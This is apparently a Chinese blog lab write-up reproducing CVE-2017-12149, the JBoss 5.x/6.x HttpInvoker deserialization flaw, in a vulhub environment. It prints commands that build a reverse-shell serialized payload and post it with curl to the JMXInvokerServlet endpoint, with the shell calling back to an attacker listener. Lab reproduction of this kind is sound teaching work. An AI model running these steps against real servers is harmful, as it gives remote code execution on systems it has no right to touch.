Loading

CVE-2017-12149 JBoss 5.x6.x 反序列化漏洞

0X00-引言


淦,今天工作量拉满,累死了

0X01-环境搭建


靶机:CentOS Linux 7

攻击机:windows server 2016 && Kail

环境:vulhub

项目地址:https://github.com/vulhub/vulhub

搭建vulhub请访问:空白centos7 64 搭建vulhub(详细)

0X02-环境描述


该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。

影响版本:

JbossAS 5.x

JbossAS 6.x

0X03-漏洞复现


01-验证

http://192.168.234.128:8080/invoker/readonly

image-20211221215147927

02-重定向到ReverseShellCommonsCollectionsHashMap.ser文件
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap 192.168.234.135:888   #填写监听机IP和port
curl http://192.168.234.128:8080//invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser  #提交二进制数据

image-20211221200545588

image-20211221215327022

03-反弹shell

image-20211221215357984

0X04-工具检测


工具下载:https://github.com/s0k/Deserialize

image-20211221220020687

0X05-免责声明


仅供学习参考

0X06-参考


[Vulhub] JBoss反序列化漏洞复现

posted @ 2021-12-21 22:12  美式加糖  阅读(222)  评论(0编辑  收藏  举报